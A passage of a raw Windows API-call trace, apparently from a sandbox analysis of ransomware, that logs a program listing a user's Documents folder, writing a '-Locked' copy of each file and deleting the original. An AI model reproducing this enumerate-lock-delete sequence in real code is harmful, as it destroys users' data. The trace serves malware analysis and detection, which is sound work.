lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x65ef9a5c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x65ef9a5c, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0299.087] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4c80bb0, ftCreationTime.dwHighDateTime=0x1d7936c, ftLastAccessTime.dwLowDateTime=0x81873220, ftLastAccessTime.dwHighDateTime=0x1d7bce6, ftLastWriteTime.dwLowDateTime=0x81873220, ftLastWriteTime.dwHighDateTime=0x1d7bce6, nFileSizeHigh=0x0, nFileSizeLow=0x2025, dwReserved0=0x0, dwReserved1=0x0, cFileName="pA5CsH5h5CcswZCjqi.docx", cAlternateFileName="PA5CSH~1.DOC")) returned 1 [0299.088] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc54d42a0, ftCreationTime.dwHighDateTime=0x1d7dcc2, ftLastAccessTime.dwLowDateTime=0xf09fdea0, ftLastAccessTime.dwHighDateTime=0x1d7dd20, ftLastWriteTime.dwLowDateTime=0xf09fdea0, ftLastWriteTime.dwHighDateTime=0x1d7dd20, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uuXtJUWZmGeM k7fGnf", cAlternateFileName="UUXTJU~1")) returned 1 [0299.088] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b7e3ec0, ftCreationTime.dwHighDateTime=0x1d7902c, ftLastAccessTime.dwLowDateTime=0xa16d9b0, ftLastAccessTime.dwHighDateTime=0x1d7abbc, ftLastWriteTime.dwLowDateTime=0xa16d9b0, ftLastWriteTime.dwHighDateTime=0x1d7abbc, nFileSizeHigh=0x0, nFileSizeLow=0x530c, dwReserved0=0x0, dwReserved1=0x0, cFileName="W7ZbDBvsnGLTRWeGfJh.pptx", cAlternateFileName="W7ZBDB~1.PPT")) returned 1 [0299.088] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4511e990, ftCreationTime.dwHighDateTime=0x1d7d864, ftLastAccessTime.dwLowDateTime=0xd774bbf0, ftLastAccessTime.dwHighDateTime=0x1d7dc38, ftLastWriteTime.dwLowDateTime=0xd774bbf0, ftLastWriteTime.dwHighDateTime=0x1d7dc38, nFileSizeHigh=0x0, nFileSizeLow=0x3a22, dwReserved0=0x0, dwReserved1=0x0, cFileName="yPcZCDl_ldX.pptx", cAlternateFileName="YPCZCD~1.PPT")) returned 1 [0299.088] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f569450, ftCreationTime.dwHighDateTime=0x1d7e34b, ftLastAccessTime.dwLowDateTime=0x8632d6d0, ftLastAccessTime.dwHighDateTime=0x1d7e51d, ftLastWriteTime.dwLowDateTime=0x8632d6d0, ftLastWriteTime.dwHighDateTime=0x1d7e51d, nFileSizeHigh=0x0, nFileSizeLow=0xa59d, dwReserved0=0x0, dwReserved1=0x0, cFileName="zBhJ.pdf", cAlternateFileName="")) returned 1 [0299.089] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d8911d0, ftCreationTime.dwHighDateTime=0x1d7c405, ftLastAccessTime.dwLowDateTime=0xeb40f10, ftLastAccessTime.dwHighDateTime=0x1d7d088, ftLastWriteTime.dwLowDateTime=0xeb40f10, ftLastWriteTime.dwHighDateTime=0x1d7d088, nFileSizeHigh=0x0, nFileSizeLow=0x78c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZFnXJ8 _1nRlfFhG.docx", cAlternateFileName="ZFNXJ8~1.DOC")) returned 1 [0299.089] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d8911d0, ftCreationTime.dwHighDateTime=0x1d7c405, ftLastAccessTime.dwLowDateTime=0xeb40f10, ftLastAccessTime.dwHighDateTime=0x1d7d088, ftLastWriteTime.dwLowDateTime=0xeb40f10, ftLastWriteTime.dwHighDateTime=0x1d7d088, nFileSizeHigh=0x0, nFileSizeLow=0x78c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZFnXJ8 _1nRlfFhG.docx", cAlternateFileName="ZFNXJ8~1.DOC")) returned 0 [0299.090] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0299.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0299.090] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked", lpFilePart=0x0) returned 0x30 [0299.090] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.090] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\1feg.xlsx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.092] GetFileType (hFile=0x498) returned 0x1 [0299.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.092] GetFileType (hFile=0x498) returned 0x1 [0299.096] CloseHandle (hObject=0x498) returned 1 [0299.097] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx", lpFilePart=0x0) returned 0x29 [0299.097] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\1feg.xlsx")) returned 1 [0299.101] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked", lpFilePart=0x0) returned 0x36 [0299.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.102] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\2xkt2 -erd.pptx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.102] GetFileType (hFile=0x498) returned 0x1 [0299.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.102] GetFileType (hFile=0x498) returned 0x1 [0299.106] CloseHandle (hObject=0x498) returned 1 [0299.106] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx", lpFilePart=0x0) returned 0x2f [0299.106] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\2xkt2 -erd.pptx")) returned 1 [0299.109] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked", lpFilePart=0x0) returned 0x38 [0299.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.109] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4 yebkiybigx.xlsx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.110] GetFileType (hFile=0x498) returned 0x1 [0299.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.110] GetFileType (hFile=0x498) returned 0x1 [0299.112] CloseHandle (hObject=0x498) returned 1 [0299.113] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx", lpFilePart=0x0) returned 0x31 [0299.114] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4 yebkiybigx.xlsx")) returned 1 [0299.116] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked", lpFilePart=0x0) returned 0x31 [0299.116] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.116] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4gh0y9.pdf-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.116] GetFileType (hFile=0x498) returned 0x1 [0299.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.117] GetFileType (hFile=0x498) returned 0x1 [0299.119] CloseHandle (hObject=0x498) returned 1 [0299.120] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf", lpFilePart=0x0) returned 0x2a [0299.120] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4gh0y9.pdf")) returned 1 [0299.122] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked", lpFilePart=0x0) returned 0x32 [0299.122] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.122] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\88z1o5.docx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.123] GetFileType (hFile=0x498) returned 0x1 [0299.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.123] GetFileType (hFile=0x498) returned 0x1 [0299.126] CloseHandle (hObject=0x498) returned 1 [0299.126] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx", lpFilePart=0x0) returned 0x2b [0299.127] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\88z1o5.docx")) returned 1 [0299.129] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked", lpFilePart=0x0) returned 0x40 [0299.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.129] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\9wui5evhxpkholhgpv40.docx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.130] GetFileType (hFile=0x498) returned 0x1 [0299.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.130] GetFileType (hFile=0x498) returned 0x1 [0299.132] CloseHandle (hObject=0x498) returned 1 [0299.133] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx", lpFilePart=0x0) returned 0x39 [0299.133] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\9wui5evhxpkholhgpv40.docx")) returned 1 [0299.135] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked", lpFilePart=0x0) returned 0x3e [0299.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.136] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\awnrfzy3e3qk1nkjdw.pptx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.137] GetFileType (hFile=0x498) returned 0x1 [0299.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.137] GetFileType (hFile=0x498) returned 0x1 [0299.139] CloseHandle (hObject=0x498) returned 1 [0299.140] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx", lpFilePart=0x0) returned 0x37 [0299.140] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\awnrfzy3e3qk1nkjdw.pptx")) returned 1 [0299.142] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked", lpFilePart=0x0) returned 0x3c [0299.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.142] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\azykagkuggsox2bnl.rtf-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.145] GetFileType (hFile=0x498) returned 0x1 [0299.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.145] GetFileType (hFile=0x498) returned 0x1 [0299.148] CloseHandle (hObject=0x498) returned 1 [0299.149] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf", lpFilePart=0x0) returned 0x35 [0299.149] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\azYkAGkUGGsOX2bnL.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\azykagkuggsox2bnl.rtf")) returned 1 [0299.151] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked", lpFilePart=0x0) returned 0x30 [0299.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.151] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\bf c.docx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.151] GetFileType (hFile=0x498) returned 0x1 [0299.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.151] GetFileType (hFile=0x498) returned 0x1 [0299.154] CloseHandle (hObject=0x498) returned 1 [0299.155] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx", lpFilePart=0x0) returned 0x29 [0299.155] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\bf c.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\bf c.docx")) returned 1 [0299.157] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked", lpFilePart=0x0) returned 0x39 [0299.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.157] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cerxr1ofwdsxa.xlsx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.157] GetFileType (hFile=0x498) returned 0x1 [0299.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.158] GetFileType (hFile=0x498) returned 0x1 [0299.160] CloseHandle (hObject=0x498) returned 1 [0299.161] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx", lpFilePart=0x0) returned 0x32 [0299.161] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\cERxr1OfWdsXa.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cerxr1ofwdsxa.xlsx")) returned 1 [0299.162] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked", lpFilePart=0x0) returned 0x32 [0299.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.163] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.163] GetFileType (hFile=0x498) returned 0x1 [0299.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.163] GetFileType (hFile=0x498) returned 0x1 [0299.166] CloseHandle (hObject=0x498) returned 1 [0299.166] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini", lpFilePart=0x0) returned 0x2b [0299.167] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\desktop.ini")) returned 1 [0299.168] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked", lpFilePart=0x0) returned 0x3f [0299.168] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.169] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\eunc2mdenvic3bg6_9q.xlsx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.169] GetFileType (hFile=0x498) returned 0x1 [0299.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.170] GetFileType (hFile=0x498) returned 0x1 [0299.172] CloseHandle (hObject=0x498) returned 1 [0299.173] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx", lpFilePart=0x0) returned 0x38 [0299.173] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\eunc2mdenvic3bg6_9q.xlsx")) returned 1 [0299.175] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked", lpFilePart=0x0) returned 0x3f [0299.175] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.175] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fqnoqaqiu_64xnnqsna.xlsx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.176] GetFileType (hFile=0x498) returned 0x1 [0299.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.176] GetFileType (hFile=0x498) returned 0x1 [0299.185] CloseHandle (hObject=0x498) returned 1 [0299.186] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx", lpFilePart=0x0) returned 0x38 [0299.186] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fqnoqaqiu_64xnnqsna.xlsx")) returned 1 [0299.190] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked", lpFilePart=0x0) returned 0x3f [0299.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.191] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fukbcywvnkwtczgpojsy.ppt-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.192] GetFileType (hFile=0x498) returned 0x1 [0299.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.192] GetFileType (hFile=0x498) returned 0x1 [0299.195] CloseHandle (hObject=0x498) returned 1 [0299.196] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt", lpFilePart=0x0) returned 0x38 [0299.196] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fukbcywvnkwtczgpojsy.ppt")) returned 1 [0299.201] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked", lpFilePart=0x0) returned 0x33 [0299.201] SetThreadErrorMode (dwNewMode=0x1, 